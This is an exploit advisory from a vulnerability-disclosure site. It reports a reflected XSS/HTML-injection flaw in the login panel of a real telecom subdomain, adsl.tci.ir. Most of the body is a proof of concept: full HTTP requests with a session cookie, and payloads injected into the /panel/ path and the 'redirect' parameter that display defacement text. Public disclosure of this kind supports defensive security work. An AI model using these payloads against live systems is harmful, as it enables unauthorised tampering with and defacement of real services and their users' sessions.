Adsl.Tci.Ir Cross-site scripting (XSS) Vulnerability

2018.12.23
ir kodak (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Adsl.Tci.Ir Cross-site scripting (XSS) Vulnerability # Exploit Author: kodak # Date: 2018-12-23 # Vendor Homepage: http://adsl.tci.ir/ # Category : webapps # Tested on: Kali Linux / Windows 7 # CVE: N/A ==================== 1. Description: ==================== Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Iran Telecommunication Company Internet Management System --> Tci.ir 'HTML Injection' On One Of The Subdomains Of The Website --> Adsl.Tci.Ir ==================== 2. Exploit/POC: ==================== [+] Request: http://adsl.tci.ir/panel/K0D4K"><br><br><center><a style="font-size:100px">IRANIAN HACKERS:)</a><br><br> Host: adsl.tci.ir User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate upgrade-insecure-requests: 1 content-type: application/x-www-form-urlencoded;charset=UTF-8 Connection: keep-alive Cookie: PHPSESSID=9jgigpjttm0956q95qlmi4beo4 [+] Response: POST: HTTP/1.1 200 OK Date: Sat, 22 Dec 2018 17:43:09 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3825 Connection: close Content-Type: text/html; charset=UTF-8 ##########/--OR--/########## [+] Request: http://adsl.tci.ir/panel/login/1545484621 POST /panel/login/1545484621 HTTP/1.1 Host: adsl.tci.ir User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate upgrade-insecure-requests: 1 content-type: application/x-www-form-urlencoded;charset=UTF-8 Content-Length: 156 Connection: keep-alive Cookie: PHPSESSID=9jgigpjttm0956q95qlmi4beo4 redirect=PRDS"><br><br><center><a style="font-size:100px">KODAK:]</a><br><br>&username=8585858585&password=K0D4K&captcha=4403203&LoginFromWeb= -------------------------------------------- http://adsl.tci.ir/panel/login/1545484621 Parameter: redirect Vulenrability : Reflected XSS Location : /panel/ Payload: PRDS"><br><br><center><a style="font-size:100px">KODAK:]</a><br><br> -------------------- 3. Screenshot -------------------- https://i.imgur.com/DuGDnCJ.jpg [!] Thanks To PRDS^^ [!]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top